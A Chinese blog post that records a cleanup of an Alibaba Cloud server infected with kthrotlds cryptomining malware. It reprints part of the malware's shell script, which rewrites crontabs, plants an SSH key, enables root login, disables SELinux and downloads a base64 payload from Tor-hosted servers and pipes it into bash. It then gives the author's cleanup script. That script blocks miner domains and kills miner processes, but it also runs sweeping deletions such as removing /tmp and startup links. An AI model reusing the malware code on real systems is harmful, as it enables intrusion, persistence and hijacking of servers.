if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi

DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools >/dev/null 2>&1

DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron

${sudo} systemctl enable ssh

${sudo} systemctl enable cron

${sudo} /etc/init.d/ssh restart >/dev/null 2>&1

elif [ -f /usr/bin/pacman ]; then

pacman -Syy >/dev/null 2>&1

pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools >/dev/null 2>&1

systemctl enable --now cronie.service >/dev/null 2>&1

systemctl enable --now sshd.service >/dev/null 2>&1

/etc/rc.d/sshd restart >/dev/null 2>&1

elif [ -f /sbin/apk ]; then

#apk --no-cache -f upgrade >/dev/null 2>&1

apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc >/dev/null 2>&1

apk del openssl-dev net-tools >/dev/null 2>&1; apk del libuv-dev >/dev/null 2>&1;

apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main >/dev/null 2>&1

rc-update add sshd >/dev/null 2>&1

/etc/init.d/sshd start >/dev/null 2>&1

if [ -f /etc/init.d/crond ]; then rc-update add crond >/dev/null 2>&1; /etc/init.d/crond restart >/dev/null 2>&1; else /usr/sbin/crond -c /etc/crontabs >/dev/null 2>&1; fi

${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1

${sudo} rm -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} rm -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/.* >/dev/null 2>&1;

${sudo} chattr -i -a /etc/cron.hourly >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.hourly/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.daily >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.daily/ >/dev/null 2>&1

${sudo} rm -rf /etc/cron.hourly/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.hourly/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/.* >/dev/null 2>&1;

${sudo} chattr -a -i /tmp >/dev/null 2>&1; ${sudo} rm -rf /tmp/* >/dev/null 2>&1; ${sudo} rm -rf /tmp/.* >/dev/null 2>&1

${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/root >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/crontabs/root >/dev/null 2>&1

if [ -f /sbin/apk ]; then

${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/crontabs/* >/dev/null 2>&1

${sudo} rm -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo "${C1}" > /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo "${C2}" >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo '' >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} crontab /etc/crontabs/root

elif [ -f /usr/bin/apt-get ]; then

${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1

rs=$(${sudo} echo "${C1}" > /var/spool/cron/crontabs/root 2>&1)

if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/crontabs/root && ${sudo} crontab /var/spool/cron/crontabs/root; fi

else

${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1

rs=$(${sudo} echo "${C1}" > /var/spool/cron/root 2>&1)

if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root; fi

${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo "${C2}" > /etc/crontab 2>&1)

if [ -z "${rs}" ]; then ${sudo} echo '' >> /etc/crontab && ${sudo} crontab /etc/crontab; fi

${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1

rs=$(${sudo} echo "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo '' >> /etc/cron.d/root 2>&1)

if [ $(crontab -l 2>/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then

(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) && chmod +x ${LPATH}.rm

(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) && chmod +x ${LPATH}.cd

(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) && chmod +x ${LPATH}.ct

if [ -f ${LPATH}.rm ] && [ -f ${LPATH}.ct ]; then

${sudo} "${crstop}"

cd=$(which crond)

ct=$(which crontab)

#if [ -n "${cd}" ]; then ${sudo} ${LPATH}.rm ${cd}; ${sudo} cp ${LPATH}.cd ${cd}; fi

if [ -n "${ct}" ]; then ${sudo} ${LPATH}.rm ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi

${sudo} "${crstart}"

${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1

if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi

${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1

if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi

if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then ${sudo} echo "${skey}" >> ${sshdir}/authorized_keys; fi

${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} rm -rf ${sshdir}/authorized_keys* >/dev/null 2>&1

[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] && { ${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config; }

[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] && { ${sudo} echo RSAAuthentication yes >> /etc/ssh/sshd_config; }

[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] && { ${sudo} echo PubkeyAuthentication yes >> /etc/ssh/sshd_config; }

[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] && { ${sudo} echo UsePAM yes >> /etc/ssh/sshd_config; }

[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] && { ${sudo} echo PasswordAuthentication yes >> /etc/ssh/sshd_config; }

touch "${LPATH}.sysud"

else

if [ $(which crontab|wc -l) -ne 0 ]; then

crontab -r >/dev/null 2>&1

(crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -

rm -rf ./main* >/dev/null 2>&1

rm -rf ./*.ico* >/dev/null 2>&1

rm -rf ./r64* >/dev/null 2>&1

rm -rf ./r32* >/dev/null 2>&1

echo -e '\n'

(${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash)

if [ ${sudoer} -eq 1 ]; then

if echo "$(${sudo} cat /etc/selinux/config 2>/dev/null|grep "SELINUX="|tail -n 1)"|grep -q 'enforcing'; then

${sudo} sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || { echo "SELinux could not be disabled. Exiting."; exit; }

${sudo} shutdown -r now >/dev/null 2>&1

${sudo} reboot -f >/dev/null 2>&1

if echo "$(sestatus -v 2>/dev/null| head -n 1)"|grep -q 'enabled'; then ${sudo} shutdown -r now >/dev/null 2>&1; ${sudo} reboot -f >/dev/null 2>&1; fi

```

这是一段200多行的shell脚本代码，没完全看懂，

大概能看到的是redis的6379端口判断密码，

屏蔽一些关键linux命令，

攻击后发起端口扫描其他机器等。

代码虽然有了，怎么能完全清除还不知道：(

记录一下。

kthrotlds挖矿病毒。

update:终于清掉了。

清理脚本(综合了网上的一些)：

service crond stop

systemctl stop crond

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP

iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP

iptables -A INPUT -s an7kmd2wp4xo7hpr.tor2web.su -j DROP

iptables -A OUTPUT -d an7kmd2wp4xo7hpr.tor2web.su -j DROP

iptables -A INPUT -s an7kmd2wp4xo7hpr.tor2web.io -j DROP

iptables -A OUTPUT -d an7kmd2wp4xo7hpr.tor2web.io -j DROP

iptables -A INPUT -s an7kmd2wp4xo7hpr.onion.sh -j DROP

iptables -A OUTPUT -d an7kmd2wp4xo7hpr.onion.sh -j DROP

busybox echo -e "\n0.0.0.0 an7kmd2wp4xo7hpr.tor2web.su\n0.0.0.0 an7kmd2wp4xo7hpr.tor2web.io\n0.0.0.0 an7kmd2wp4xo7hpr.onion.sh" >> /etc/hosts

busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts

busybox rm -f /usr/local/lib/libioset.so

busybox rm /usr/local/lib/libcset.so

chattr -i /etc/ld.so.preload && busybox rm -f /etc/ld.so.preload

busybox rm -f /etc/ld.so.cache

lsof |grep usr/local/lib/libioset.so

echo $LD_PRELOAD

rm -rf /usr/sbin/kerberods

rm -rf /etc/init.d/netdns

rm -rf /etc/rc.d/rc0.d/K01netdns

rm -rf /etc/rc.d/rc1.d/K01netdns

rm -rf /etc/rc.d/rc2.d/S99netdns

rm -rf /etc/rc.d/rc3.d/S99netdns

rm -rf /etc/rc.d/rc4.d/S99netdns

rm -rf /etc/rc.d/rc5.d/S99netdns

rm -rf /etc/rc.d/rc6.d/K01netdns

rm -rf /etc/systemd/system/multi-user.target.wants/netdns.service

rm -rf /usr/lib/systemd/system/netdns.servic

rm -rf /usr/sbin/kerberods

rm -rf /etc/init.d/netdns

rm -rf /etc/rc.d/rc0.d/K*

rm -rf /etc/rc.d/rc1.d/K*

rm -rf /etc/rc.d/rc2.d/S*

rm -rf /etc/rc.d/rc3.d/S*

rm -rf /etc/rc.d/rc4.d/S*

rm -rf /etc/rc.d/rc5.d/S*

rm -rf /etc/rc.d/rc6.d/K*

rm -rf /etc/systemd/system/multi-user.target.wants/netdns.service

rm -rf /usr/lib/systemd/system/netdns.servic

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9

ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9

ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "ksoftirqds" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "watchdogs" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "kthrotlds" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "kerberods" | awk '{print $2}'|xargs kill -9

ps aux|grep an7kmd2wp4xo7hpr|grep -v grep |awk '{print $2}'|xargs kill -9

busybox pkill watchdogs

busybox pkill ksoftirqds

busybox pkill kthrotlds

#find / -mtime +10 -a -mtime -50 -type f |more

busybox rm /sbin/watchdogs

busybox rm /usr/sbin/watchdogs

busybox rm /usr/sbin/kthrotlds

busybox rm /usr/sbin/ntpd

busybox rm /etc/init.d/watchdogs

busybox chattr -i /usr/bin/kerberods && busybox rm -rf /usr/bin/kerberods

busybox chattr -i /tmp && busybox rm -rf /tmp

busybox chattr -i ~/.ntp && busybox rm -rf ~/.ntp

busybox chattr -i ~/.cache && busybox rm -rf ~/.cache

busybox chattr -i /.cache/* && busybox rm -rf /.cache

busybox chattr -i /.cache/.kswapd && busybox rm -rf /.cache/.kswapd

busybox chattr -i /var/spool/cron/root && busybox rm /var/spool/cron/root && busybox touch /var/spool/cron/root && busybox chattr +i /var/spool/cron/root

busybox chattr -i /var/spool/cron/crontabs/root && busybox rm /var/spool/cron/crontabs/root && busybox touch /var/spool/cron/crontabs/root && busybox chattr -i /var/spool/cron/crontabs/root

busybox chattr -i /etc/cron.d/root && busybox rm /etc/cron.d/root && busybox touch /etc/cron.d/root && busybox chattr +i /etc/cron.d/root

busybox chattr -i /etc/cron.d/* && busybox rm -f /etc/cron.d/*

busybox chattr -i /etc/cron.hourly/* && busybox rm -f /etc/cron.hourly/*

busybox chattr -i /etc/cron.daily/* && busybox rm -f /etc/cron.daily/*

busybox chattr -i /etc/cron.monthly/* && busybox rm -f /etc/cron.monthly/*

busybox chattr -i /etc/cron.weekly/* && busybox rm -f /etc/cron.weekly/*

busybox find / -type f -name '*watchdogs*' | busybox xargs rm -f

busybox find / -type f -name '*kthrotlds*' | busybox xargs rm -f

busybox pkill watchdogs

busybox pkill ksoftirqds

busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9

busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9

一个阿里云 linux服务器被植入病毒的记录

你可能感兴趣的:(一个阿里云 linux服务器被植入病毒的记录)